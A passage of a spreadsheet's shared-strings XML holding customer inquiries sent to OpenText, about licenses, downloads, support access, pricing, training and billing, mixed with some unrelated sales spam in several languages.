• 6 licenses/ workstations which have Designer,  Document Creator (server),  Dynamic Charting (server), • Advanced Tables (server),  Dynamic Content Import (server), Campaign Management (server) and capable of emitting AFP and XML and a High Volume (server)_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir haben die Software streamserve mit der Version 5.5.0 Build 977 bei uns im Einsatz. Unsere Kundennummer lautet U00158868. _x000D_
_x000D_
Im Zuge eines Rechnerwechsels würden wir auf die aktuelle Version von streamserve wechseln. Steht die Software zum Download bereit, hierfür benötigen wir allerdings noch die login-Berechtigung für das Kundenportal, da diese uns nicht mehr zur Verfügung steht._x000D_
_x000D_
Könnten Sie uns bitte bezüglich der Umsetzungsstrategie entsprechend beraten? Vielen Dank für Ihre Bemühungen._x000D_
_x000D_
Ich habe diese Anfrage bereits am 23.08. gesendet aber noch keine Antwort erhalten._x000D_
MfG_x000D_
Manuel Disse</t>
  </si>
  <si>
    <t xml:space="preserve">I would get more information of the strategic positioning resp roadmap related to Opentext Gupta Team Developer. What are the next releases and for how long will it still be supported?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">required a docummentum admin training </t>
  </si>
  <si>
    <t>Hello OpenText,  I am in the process of renewing faxsoftware. This could be an upgrade of the current software or a new product like yours._x000D_
What I want to know is what we might need from OpenText Rightfax in our environment._x000D_
Currently we have a fax solution that exists of 2 windows servers that has the fax software installed, connected via Dialogic Brooktrout to our T.38 Sonus gateways. It must be possible to send faxes from Xerox or HP MFP devices and incoming faxes must be directed to a mailbox. I would like to know what your advise is and what the costs are._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Позвоните мне, пожалуйста, по этому номеру 8(495) 230-10-78</t>
  </si>
  <si>
    <t>Hi we are working on a proposal with a client for which we would like to get a budgetary quote for the following items. APpreciate if anyone can reach out to me for further discussion._x000D_
_x000D_
Opentext Streamserve - Qty : 100,000</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
Can you please send content server installation link. and also how to install?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm familiar with OCC and I want to partner up with OT to sell OCC software and services. </t>
  </si>
  <si>
    <t>We are one of the biggest IT reseller in Mauritius. One of our customers is looking for centura-gupta IDE. How can we proceed with this?</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir setzen aktuell Ihr Produkt RightFax Server in der Version 10.6 ein._x000D_
Mit der Einführung wurde damals ein Softwarewartungsvertrag über den Dienstleister abgeschlossen, dieser ist Ende letzten Jahres ausgelaufen._x000D_
Können Sie uns ein Angebot über die Aufnahme eines neuen Softwarewartungsvertrages unterbreiten?_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
i.A. Fabian Küppers_x000D_
_x000D_
Hans Soldan GmbH_x000D_
Informationstechnik_x000D_
Bocholder Straße 259, 45356 Essen _x000D_
Telefon: 0201 8612-220_x000D_
Mobil: 0172 6393-351_x000D_
Telefax: 0201 8612-333_x000D_
E-Mail: kueppers@soldan.de_x000D_
_x000D_
Handelsregister:  HRB Essen 7876_x000D_
Geschäftsführer: René Dreske_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Merci de nous communiquer qui est notre contact commercial pour Chimex- LOREAL ._x000D_
Urgent_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Selma Jameleddine and I am a consultant at Capgemini Consulting. My team and I have some questions about OpenText products that we would like to discuss with you. _x000D_
Thank you for taking the time to read my message._x000D_
Selma Jameleddine</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
Please acknowledge receipt f the email below_x000D_
_x000D_
yours _x000D_
_x000D_
Bill_x000D_
_x000D_
Mr William Todd MBE|General Contracts Officer QMs Department (PP6)|Enterprise Building|Defence School of Police and Guarding | Southwick Park, Fareham, Hampshire, PO17 6EJ | 93835 4404 | 02392 284404| Fax 02392 284311 |_x000D_
_x000D_
From: Todd, William D (DSPG-QM-GCO-Wider Markets) _x000D_
Sent: 03 September 2018 14:06_x000D_
To: 'credit.control@opentext.com' &lt;credit.control@opentext.com&gt;_x000D_
Subject: OTUK/UK10 Reorganisation of Guidance Inc dated 1 July 18_x000D_
_x000D_
Dear MR Riopel._x000D_
_x000D_
Thank you for your letter dated 1 July 18._x000D_
_x000D_
We cannot find any reference within our college of assets either hired or purchased from OpenText._x000D_
_x000D_
Could you please advise as to what assets your letter is referring please._x000D_
_x000D_
yours_x000D_
Bill_x000D_
_x000D_
Mr William Todd MBE|General Contracts Officer QMs Department (PP6)|Enterprise Building|Defence School of Police and Guarding | Southwick Park, Fareham, Hampshire, PO17 6EJ | 93835 4404 | 02392 284404| Fax 02392 284311 |_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We need a demo on the Myraid Software</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
_x000D_
I am Asha form Volvo Trucks, Bangalore, India._x000D_
_x000D_
We have some requirements to check the images comparison of old drawings vs revised drawings (Pdf, tiff or Jpeg.) I hope your software works fine with it._x000D_
We wanted to know that how the tool works for our requirement, if your team give demo for us it will be helpful for us to proceed further. _x000D_
_x000D_
Regards,_x000D_
Asha H M_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am Asha form Volvo Trucks, Bangalore, India._x000D_
_x000D_
We have some requirements to check the images comparison of old drawings vs revised drawings (Pdf, tiff or Jpeg.) I hope your software works fine with it._x000D_
We wanted to know that how the tool works for our requirement, if your team give demo for us it will be helpful for us to proceed further. _x000D_
_x000D_
Regards,_x000D_
Asha H M_x000D_
</t>
  </si>
  <si>
    <t>I am part of the IT team that supports opentext system in ingram micro. Can you kindly pattern my access same with my colleague: abegael.ondo@ingrammicro.com_x000D_
_x000D_
Also kindly grant access to creating tickets._x000D_
_x000D_
Thank you_x000D_
Meinard Padernal_x000D_
SAP /  OPENTEXT inhouse consultant for Ingram Micro_x000D_
+639175461328_x000D_
meinard.padernal@ingrammicro.com</t>
  </si>
  <si>
    <t xml:space="preserve">Currently our company is using StreamServe Persuasion 5.6.1 with yearly maintenance and run on on O/S MS 2008._x000D_
As MS 2008 is going to expire, we need to migrate server platform to MS 2016._x000D_
We need advice to continue the solution to run on MS 2016._x000D_
Appreciate if you can contact me ASAP. Thanks._x000D_
</t>
  </si>
  <si>
    <t>I want to evaluate prices and benefits of OpenText Cloud Platform, specifically to sell it as part of a complete ECM solution to one of my clients. I've worked with IBM in the past, but I have seen that some of my old IBM Clients choose OpenText ECM solutions, and I really want to know why.</t>
  </si>
  <si>
    <t xml:space="preserve">Problemas para crear una cuenta para en la web </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
  WE WOULD LIKE TO INQUIRE THE BELOW LISTED_x000D_
_x000D_
ITEMS AND IF YOU CAN SPECIAL ORDER_x000D_
_x000D_
_x000D_
    Grundfos submersible water pump with model numbers below:_x000D_
_x000D_
_x000D_
1:Grundfos 22SQ15-220	1-1/2HP	230	#96160158_x000D_
_x000D_
2:Grundfos 10SQ15-330   1-1/2HP 200-240Volt  #96160144_x000D_
_x000D_
KINDLY GET US PRICING AND AVAILABILITY , AS_x000D_
_x000D_
WELL LETS KNOW THE MODE OF PAYMENT WHEN WE_x000D_
_x000D_
PURCHASED FROM YOUR COMPANY._x000D_
_x000D_
Ragerd,_x000D_
_x000D_
Rick Giles_x000D_
National Electrial supply Inc_x000D_
267-527-3411_x000D_
nationalelectrialsupply@gmail.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Alexa Caswell, would you be interested in purchasing our updated and permission based Media and Entertainment Industry Decision Makers Email List across USA, Canada &amp; Australia. _x000D_
_x000D_
In our list every lead includes: Contact Name, Job title, Company name, Website, Physical address, City, State, Country, Phone Number, Industry vertical &amp; Opt-in E-mail address._x000D_
_x000D_
I’d be happy to send over few Sample data for your reference and please let me know would you like reach the below mentioned target market criteria? _x000D_
_x000D_
•	Owner/President/Director/CEO/COO/CFO/MD/VP/GM_x000D_
•	Media and Entertainment Manager/Director_x000D_
•	Media and Entertainment Equipment Engineer/Manager_x000D_
•	Media Planner/Buyer/Consultant_x000D_
•	Multimedia Manager/Director_x000D_
•	Production Engineer/Manager_x000D_
•	Broadcasting Engineer/Manager_x000D_
•	Production House Owner/Manager_x000D_
•	Media Advertising and Promotion Manager/Director_x000D_
•	Audio Visual Engineer/Manager_x000D_
•	Lighting Engineer/Designer_x000D_
•	Animation and Special Effect Manager_x000D_
•	Studio Owner/Manager_x000D_
•	Theater and Event Hall Owner/Manager_x000D_
•	Event Promoter/Organizer_x000D_
•	Stage Designer/Planner_x000D_
•	Cinema and Movie Operator/Distributor_x000D_
•	Creative Head/Director_x000D_
•	Facility Manager/Director_x000D_
•	Operation Manager/Director_x000D_
•	Sales and Marketing Manager/Director_x000D_
•	Purchasing and Procurement Manager/Director_x000D_
•	Dealer/Distributor/Supplier/Retailer_x000D_
_x000D_
Else, please fill your specific target market criteria in the below mentioned format, So that I can run counts and get back to you with samples, benefits and more information for your review._x000D_
_x000D_
Target Job title: _________ Target Industry: ______________   Target Geography: _____________ _x000D_
_x000D_
Thank you so much for reading my mail even in your busy schedule._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Alexa Caswell _x000D_
Business Development Coordinator_x000D_
US Data - Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
Email: alexa.cwel@greenprospect-us.com_x000D_
_________________________________________x000D_
If you no longer wish to hear fro</t>
  </si>
  <si>
    <t>Would like 30 minute demo geared toward a corporate legal environment.</t>
  </si>
  <si>
    <t xml:space="preserve">I need help setting up an account for the Secretary of States Office. please contact me as soon as possible. </t>
  </si>
  <si>
    <t>Interested in redaction capability.  Brava! Desktop</t>
  </si>
  <si>
    <t>Hello, I was wondering if there is any way we could get a Fax2Mail number that has been unprovisioned reprovisioned in a faster time frame than the default time frame. Thanks!</t>
  </si>
  <si>
    <t>how do i find my product to download along with keys? here is the information from our invoice_x000D_
_x000D_
End User Company: 10474096 - Invivoscribe Technologie_x000D_
Reseller/Distributor Company: 10060209 - SHI International Corp._x000D_
Sales Order Number: 39316_x000D_
Delivery Number: 8000028036_x000D_
System Unique ID (SUID): 44444-12643_x000D_
Software License Description: / RIGHTFAX</t>
  </si>
  <si>
    <t xml:space="preserve">Checking the status of our support contract for EDiscovery and Forensic. </t>
  </si>
  <si>
    <t>We recieved a letter from accounts payable (Iris Mae Billones) regarding to 4 documents from 2017 pending yo pay. We don’t recognize Those charges. Could you give us more information?</t>
  </si>
  <si>
    <t>I would like to encounter new challange to improve my life.</t>
  </si>
  <si>
    <t>Why is OpenText assigning ZERO CPEs to On-Demand courses? What about all the examiners and analysts who are unable to attend in-person courses due to disabilities such as chemical sensitivities and Autism??? I have Aspergers and have been in the IT Security field since 1999 and a Digital Forensic Examiner for the past 15 years but cannot even take a bus let alone and airplane to attend conferences due to Asthma cuased by chemical sensitivities.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are planning to integrate to 2 channels in the next couple of month. _x000D_
These channels are Macys and Bloomingdales which require Open text - we will be going through Channel advisor to manage our product information etc._x000D_
I believe you have experience with channel advisor - could you possibly send me a price list  and terms to support this please?_x000D_
Thanks,_x000D_
Artur.</t>
  </si>
  <si>
    <t>Need to be added to account admin so I can create a ticket. Our SUID is 36401-12162</t>
  </si>
  <si>
    <t>We're looking for a global product notification tool.</t>
  </si>
  <si>
    <t>I am researching DAM systems for our company and wanted to know if you have trail version we can test out?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning Accounts Payable._x000D_
_x000D_
We are in receipt of Check No. 2000020926 in the amount of $198.55 received 08/18/2018; unfortunately we are unable to determine the account number to apply the payment. Please provide the account number and or copy of invoice/statement so we may apply accordingly. If you have any questions, please don’t hesitate to contact me._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Daphonie Hawthorne_x000D_
AT&amp;T Global Payment Strategies _x000D_
and Operations_x000D_
4331 Communications Dr._x000D_
Dallas, TX  75211_x000D_
214-721-3626_x000D_
</t>
  </si>
  <si>
    <t>We have created the account but still didn't get the access to raise any ticket with opentext</t>
  </si>
  <si>
    <t xml:space="preserve">We are a US subsidiary of a European company that manufactures skin cosmetic products. We will work with big US retailers offering them drop-shopping services for our imported products. These retailed require us to be EDI capable. Therefore, I would be grateful if you would provide me the insights of solutions and services you may offer. _x000D_
We will use QuickBooks as our accounting software._x000D_
_x000D_
Thank you for help!_x000D_
</t>
  </si>
  <si>
    <t>Hello Support,_x000D_
_x000D_
I am an IT technician from Erwin Junker Maschinenfabrik GmbH in Germany. We bought a licence of Brava! Desktop. I was able to download the software. But I am not able to download the licence key file. I got a "We're sorry, your account does not grant you access to this resource." every time when I try to open the Activations/Keys menu. And there is also the message that I still have to "Request Confirmation Email". I did the request several times and I also confirmed it by opening the link in the email. But the same message appears again and again when I try to open the Activations/Keys menu._x000D_
_x000D_
Please help. I need the license key for Brava! Desktop._x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t>We are using older version of Documentum and will be using it longer term than previously expected.  We are currently on servers which must be upgraded in the near term.  Can you help with couple immediate questions:_x000D_
1. Does GE (Cincinnati) have a current support agreement with you for Documentum?  If so, who is our OpenText contact?_x000D_
2. If we do not have support in place, can you supply a general tech resource to discuss some of our short term and long term needs to upgrade documentum as well as what versions are compatible with with servers?_x000D_
Based on your response, I'd like to setup a quick call with your tech person this week to get some basic questions answered._x000D_
Thanks.  Marcus</t>
  </si>
  <si>
    <t>Hi, how can I connect with your Singapore team? I'm interested to learn more about Opentext. I'm currently working with an Indonesian company to explore a legal document management &amp; automation software developer and will be in Singapore next week. Thanks!</t>
  </si>
  <si>
    <t>I can't reset my password from the email you sent me. Please can you resend the link or advise ?_x000D_
regards_x000D_
Tim</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,_x000D_
I would like to speak to someone regarding a fax replacement solution for one of our customers in the Healthcare industry._x000D_
Many Thanks_x000D_
Lisa </t>
  </si>
  <si>
    <t>Dear Opentext-team,_x000D_
OdeloFarba Group (HQ in Stuttgart/Hedelfingen) is a OEM in the automotive industury and is implementing S/4. In scope there is also the requirement to introduce a new VIM-system._x000D_
Open-text, being a reputable SAP solution provider, is an attractive candidate, so i am sure, that it should also join the tender for this sub-project._x000D_
I suggest, that all further details should be discussed after this inital correspondence._x000D_
Goal is to identify our requriement (VMI &amp; travel management), and place a binding offer._x000D_
Looking forward to your contact._x000D_
KR,_x000D_
Janez Prezelj</t>
  </si>
  <si>
    <t>Pricing info and Demo on DAM product</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
_x000D_
Can you please inform me if OpenText Explore Professional 4.8 is available as a standalone product to purchase or will I have to purchase the Opentext Experience Suite? _x000D_
_x000D_
Kind regards,_x000D_
Yasmin </t>
  </si>
  <si>
    <t xml:space="preserve">we are evaluating the options of _x000D_
option1: either to upgrade our current TCP version 10.5 (Hosted locally) to the current version of the TCP v.16.1 _x000D_
option2: OpenText™ Cloud_x000D_
_x000D_
PROBLEM: the link on your WebSide  ..campaigns/overview-of-the-opentext-cloud does not allow download after email.  ( eloqua--&gt; Does not work!)_x000D_
I need:_x000D_
1.) to have a copy of the document._x000D_
 2.) I need to know if TCP  application can be included in the Managed by you OpenText™ Cloud._x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
leider finde ich auf Ihrer Webseite keine Möglichkeit, die Lizenzbedingungen einzusehen. Können Sie mir bitte die Lizenzbedingungen für Exceed 15 zur Verfügung stellen?_x000D_
Vielen Dank und Grüße,_x000D_
Silvia Heßling</t>
  </si>
  <si>
    <t xml:space="preserve">FAO Facilities Management, UK._x000D_
_x000D_
I trust this email finds you well._x000D_
_x000D_
I act for a number of occupiers and developers in the City of London with regards to mitigating the level of Business Rates paid for occupation and or ownership of a commercial premises._x000D_
_x000D_
I would be keen to have a chat with you regarding both liability and reducing the level of Business Rates that will be placed on the property, once rated._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
John _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To Whom It May Concern:_x000D_
_x000D_
_x000D_
_x000D_
Greetings!_x000D_
_x000D_
_x000D_
This letter is to introduce Mary Kay Cosmetics special image enhancement class which our company has been has been teaching in the US for over 50 years. We are in the Philippines for eighteen years now, and have been conducting personality development, skin care class, facial and hand spa pampering to different corporate offices, schools, malls, communities and related establishments._x000D_
_x000D_
_x000D_
Our Skin Care Class is highly interactive as participants get to try on the products. We will provide education and tips on facial care especially to those who are suffering from skin problems like wrinkle, acne, and pimple. We will also take up the basics on make-up and provide tips on how to wear appropriate make-up for different working environment._x000D_
_x000D_
_x000D_
In line with this, we would like to request from your office if we could conduct the skin care call with your employees at your most available day and time. Our wellness and pampering session if for 1 hour and is designed to help men and women look at their optimum best. We will be offering free facial, hand spa, make over and beauty consultation. Rest assured that all of you will enjoy the pampering session. We have found that by helping people look at their best, we also help them improve their confidence and personality._x000D_
_x000D_
_x000D_
_x000D_
We trust that your good office will give us the opportunity to demonstrate our products and help empower your people._x000D_
_x000D_
_x000D_
Thank you and we are looking forward to hear from you the soonest._x000D_
_x000D_
_x000D_
Respectfully yours,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
DEBORAH LAEJ D.ROBLEDO_x000D_
Independent Senior Beauty Consultant _x000D_
_x000D_
Mary Kay Philippines_x000D_
_x000D_
Contact Number: 0956 075 2900_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I could not access the customer support site to download the latest version of EnCase Forensic V8 after creating the account.  Your web site says that I have no access and "records indicate that you have registered for access to My Support but have not yet confirmed your email with us." .  I have been clicking the request for confirmation email and confirmed it by clicking on the link of the email several times.  I still could not access the MySupport. </t>
  </si>
  <si>
    <t>Hallo, _x000D_
_x000D_
ich hatte schon kontakt mit Arno Koslowski von Opentext. Leider ist Herr Koslowski nun aber bis 10.9. nicht zu erreichen. _x000D_
_x000D_
Es geht um eine Testversion des NFS Client für Windows. Laut Herr Koslowski wurde ich für eine 30 Tage Testversion freigeschaltet, jedoch weiß ich aber nicht woher ich diese Version herunterladen kann. _x000D_
_x000D_
Können sie mir helfen eine Testversion zu bekommen?_x000D_
_x000D_
Danke,_x000D_
Benjamin Rapp</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
We are looking for a Vendor Training on "Capital Project". May I know the duration and topics that will be covered from OpenText on "Capital Projects"._x000D_
_x000D_
Appreciate your prompt reply on this._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Hemant MIttal</t>
  </si>
  <si>
    <t xml:space="preserve">Renewal of Brava reader </t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Good day!_x000D_
_x000D_
I would like to additionally inquire how can I have access to My Support for software, patches, documentation, forums, complete Knowledge Base Articles, and many other services included in your contract; in addition, you can manage your tickets, account, contract, and licenses? Currently my team do not have an OpenText Customer Support maintenance contract._x000D_
_x000D_
If we wanted to have it, how can we avail it? As my team wanted to inquire or know the licenses prices or product packages for Opentext VIM and ICC. And what will be the prerequisites or requirements (ex:  table lists all software required to implement and run the solution including servers and licenses). Thank you._x000D_
_x000D_
Appreciate your immediate response as I will be sending a solution proposal to my Senior Manager and Director._x000D_
_x000D_
_x000D_
Warm Regards,_x000D_
Kathy</t>
  </si>
  <si>
    <t>HI,_x000D_
I am booked on the NTFS course starting on 2nd of October, however may need to withdraw. What is the process for doing this, and when is the next NTFS course running in Reading?_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently seeking for a solution on document management system, and would like to see if OpenText have such solution in place which we can request for a demo, thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern:_x000D_
_x000D_
I am interested in learning more about the Sentiment Analysis platform and learning how I can integrated this tool into my consulting business model._x000D_
_x000D_
Thank you,_x000D_
Godfrey_x000D_
</t>
  </si>
  <si>
    <t>I have applied for the job vacancy on Documentum. Would like to know the status of my application. Thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for pricing on 10 email addresses that I can host from my server. What are the minimal Specs. for such a project if it is available? </t>
  </si>
  <si>
    <t>Hi Guys, _x000D_
I would like to subscribe to the Opentext Newsletter, I was unable to find where to do this on the website?_x000D_
_x000D_
Kind Regards_x000D_
Meg Trewhella</t>
  </si>
  <si>
    <t>I am trying to find pricing information for Captiva, to use in order to scan and extract information from documents. Is this included in the Core product, or is this something that needs to be quoted? Thanks.</t>
  </si>
  <si>
    <t>Analise de soluções DMS para implantação interna.</t>
  </si>
  <si>
    <t>Hi, can you send me any partner in Mexico with best experince, please, greetings</t>
  </si>
  <si>
    <t xml:space="preserve">Estamos fazendo modificações em nossa infra e precisamos do custo de atualização do nosso licenciamento Brava for SharePoint 2013 for pin# 401513 para o SharePoint 2016. </t>
  </si>
  <si>
    <t>Good Morning,_x000D_
I applied to complete the ENCE ondemand course last week, and have not had confirmation for this.  Is there anything else I need to do ?_x000D_
I look forward to hearing from you_x000D_
kind regards_x000D_
Jo.</t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
_x000D_
I am Sanjeev Yadav,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Sanjeev Yadav</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I stumbled upon your website and found it quite impressive._x000D_
_x000D_
I'm Kristi (Senior Business Development Executive) from a reputed ISO Certified, Google Partner company._x000D_
_x000D_
We are a One-Stop Web Shop team of 50 Experts who can efficiently handle all your additional work as your back-end team._x000D_
_x000D_
Our Rate: $10/ hour_x000D_
_x000D_
_x000D_
What can we do in your back-end_x000D_
  •High-end Websites in WordPress, Magento, Shopify, .Net, PHP (Custom design as well as theme based)_x000D_
  •SEO, SMO, PPC, ORM_x000D_
  •Sales Page, Logo, Graphic design_x000D_
  •Mobile Apps_x000D_
_x000D_
Why us_x000D_
_x000D_
Save upto 70% of your cost by outsourcing your work to us_x000D_
Actively concentrate more on expanding your business with new customers while we, as your back-end team, handle the technical stuff for you._x000D_
_x000D_
Work Process:_x000D_
_x000D_
You'll get Daily Work Report, real-time Work-in-Progress Update and quick communication with your 100% satisfaction._x000D_
_x000D_
Do let me know your Phone/ Skype id if you're interested for a quick discussion._x000D_
_x000D_
Warm Regards,_x000D_
Kristi Jencks_x000D_
</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
zurzeit befinden wir uns bei der Debeka in einer Evaluationsphase _x000D_
hinsichtlich der Ablösung unseres bisherigen Trägersystems im _x000D_
Inputmanagementsystem._x000D_
_x000D_
Daher würden wir gerne weitere Informationen zu Ihrem Produkt "InputAccel" erhalten._x000D_
_x000D_
Für Ihre Antwort und Ihre Bemühungen bedanke ich mich bereits jetzt._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Enver Nix</t>
  </si>
  <si>
    <t>Creation vendor account</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
We are software resellers based out in Bangalore, India._x000D_
One of our customer HCL Technologies has the below requirement:_x000D_
"Opentext Desktop Viewer"-(should be able View, Markup &amp; Edit)._x000D_
Kindly share the quote for the same._x000D_
Look forward for your support._x000D_
Regards,_x000D_
Kavya</t>
  </si>
  <si>
    <t>Looking for A/P automation solution</t>
  </si>
  <si>
    <t xml:space="preserve">At Hampshire County Council we are embarking on a major migration project to move all of our applications.  One of the services in scope is the eWork Application, which currently runs here. _x000D_
_x000D_
Specifically with regards to this Application could you please confirm, at your earliest possible convenience, the compatible versions of SQL on which this application is currently able to run? _x000D_
_x000D_
If you have any questions or require further clarification please do not hesitate to contact me. _x000D_
_x000D_
Thank you for your help in this matter._x000D_
_x000D_
Kind regards_x000D_
Felicity Smith _x000D_
_x000D_
Project Delivery Technician _x000D_
Felicity.smith2@hants.gov.uk_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Request quotation for Software &amp; Training</t>
  </si>
  <si>
    <t xml:space="preserve">I am Joe Lam and interested in your company’s Video Analytics solution that could be upsold to our customers._x000D_
Would you please contact me and arrange a meeting that enables us to understand more about the solutions and products._x000D_
_x000D_
Thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Good day!_x000D_
_x000D_
We are currently planning a solution for SAP Ariba and Opentext VIM integration (including ICC) both in SAP Business Suite (ECC) and SAP S/4 Hana._x000D_
_x000D_
I would like to request a quotation of how much is the current rate or price to obtain the required licenses. And if you can provide an updated list (checklist) of servers and/or licenses that will be related to this solutions._x000D_
_x000D_
Appreciate your immediate response and update as I wanted to send the proposal to my manager and director as soon as possible. Thank you._x000D_
_x000D_
_x000D_
Warm Regards,_x000D_
Kathy</t>
  </si>
  <si>
    <t xml:space="preserve">I work for Reckitt Benckiser UK customer ID 501977625_x000D_
We have 4 GLN mailboxes in the UK &amp; Ireland where our trading partners send and receive EDI messages. _x000D_
_x000D_
These 4 GLN mailboxes are registered with GS1 show and these as being registered with OpenText in the GS1 Company Prefix Licensee.  Is it possible for these GLN's to be updated by OpenText so that these mailbox are shown as:- _x000D_
 _x000D_
5013546134301  Reckitt Benckiser Health UK Commercial Limited_x000D_
5013546134608  Reckitt Benckiser Hygiene Home UK Commercial Limited_x000D_
5398888511141 Reckitt Benckiser Health Ireland _x000D_
5013546331922 Reckitt Benckiser Hygiene Home Ireland_x000D_
_x000D_
Can you advise if this is possible and what would be required? _x000D_
_x000D_
Kind Regards _x000D_
_x000D_
David Powell_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">License activation _x000D_
_x000D_
Dear, _x000D_
Last week I tried to activate Rightfax 10.6 from offline activation (from webpage). I tried to save x m l license from chrome web browser - unfortunately file can't be saved and copied. _x000D_
_x000D_
When I try to activate from Internet explorer I have information that rightfax already activated on another server. I filled all required forms such as SUID, email etc. _x000D_
_x000D_
Could you help with product activation? _x000D_
_x000D_
Thanks in advance, _x000D_
Piotr_x000D_
</t>
  </si>
  <si>
    <t>September 03, 2018_x000D_
The Menu Group Inc._x000D_
No. 3 San Antonio Street Barangay Kapitolyo_x000D_
Pasig City, Philippines._x000D_
_x000D_
Dear Open Text, _x000D_
_x000D_
Greetings! I'm Christine Ann Mendoza, Sales Associate of The Menu Group Inc. which is located in Kapitolyo, Pasig City. I have a proposal for you. The Menu Group Inc. is a restaurant company that offers you catering services (In-house catering services and Full catering services) for any events. The good news here is they serve it with a twist and with an affordable price that we can further discuss if you let me meet with one of your staffs. I'm looking forward to discuss my proposal if you need a caterer in one of your events. _x000D_
_x000D_
We can also do daily pack meals for your employees depending on your budget. Also, you can book a reservation in one of our restaurants to me._x000D_
_x000D_
We have some of the finest workers and staff employed in our respective establishments. And we guarantee you the best experience here at SANGKAP and SOBREMESA by The Menu Group Inc. If you're interested call, text or email me so that we can schedule an appointment._x000D_
_x000D_
Thank you and I'm looking forward to servicing your needs._x000D_
_x000D_
Sincerely Yours,_x000D_
_x000D_
Christine Ann Mendoza_x000D_
Sales Associate - The Menu Group Inc._x000D_
tin@themenugroup.com_x000D_
0917-706-7933_x000D_
+632 755 6703</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I have some questions about the private AppStore from you:_x000D_
- Can there be multiple versions of one application in the AppStore?_x000D_
- Is it possible to assign to the user (our customer) the version of the app that is offered through the AppStore for the iOS device?_x000D_
- What are the payment terms? Disposable or per device or per user or otherwise?_x000D_
- Please offer us the price for your solution for about 20 devices / 20 users._x000D_
Thanks and have a nice day._x000D_
</t>
  </si>
  <si>
    <t>RW</t>
  </si>
  <si>
    <t>My company is in Cyber Security and we would like to offer Forensics services._x000D_
In a addition, there is an open tender which ends 11th  September we wanted to participate in.</t>
  </si>
  <si>
    <t>Documentum - Business opportunity - We would require the cost for _x000D_
Content Server_x000D_
xCP_x000D_
xCP Designer_x000D_
DA</t>
  </si>
  <si>
    <t>We have a renewal for a software . Need to contact a sales person from Open text</t>
  </si>
  <si>
    <t>Dear, We have RightFax – Renewal Software subscription and annual maintenance renewal (1 license) requirement from one of our client. Could you please share the quote for this._x000D_
Kindly do contact us if you need more information._x000D_
Closing date of this RFQ is on 5th September 2018._x000D_
_x000D_
Regards,_x000D_
Neeva</t>
  </si>
  <si>
    <t xml:space="preserve">I am attempting to book myself onto a course - DF420 - Macintosh Examinations with EnCase, Reading, Dec 11th to 14th 2018._x000D_
I have an Encase passport number - 139993_x000D_
but when I attempt to add the course to my cart, the course does not appear in my cart when I go to check out. _x000D_
I have received an email from Deborah Guerrero Rebultan &lt;drebultan@opentext.com&gt;, who stated due to my extenuated circumstances, I am able to sit this course, despite my passport expiring in November._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
Can you please confirm Windows applications developed in TD 6.1 &amp; TD 6.3 would be work in Windows Server 2016 ?_x000D_
</t>
  </si>
  <si>
    <t>I canceled my Fax2Mail account on July 8th (Your Fax2Mail account has been canceled - reference 1747026750).  I received an invoice for the last month in the amount of $13.99, which I paid by check on August 19th.  I just noticed that I have a charge on my credit card in the amount $26.94 on August 22nd.  This charge needs to be credited to my credit card._x000D_
_x000D_
Thank you._x000D_
_x000D_
Greg Marek</t>
  </si>
  <si>
    <t>Looking for HR employee document management solution</t>
  </si>
  <si>
    <t>Hi_x000D_
I bought an Encase V8_x000D_
But now I don't know how can I register to the Quidance website to access to the new versions and files and etc._x000D_
Could you please help me?_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi, I am working on an internal research study where I need to evaluate different data archiving solutions. So, I need some information about the capabilities of InfoArchive solution. Is it just a utility that assists in archiving data or provides an end-to-end data archival i.e. reads data from source, sends it to the storage where it will be archived and provides storage facility too?</t>
  </si>
  <si>
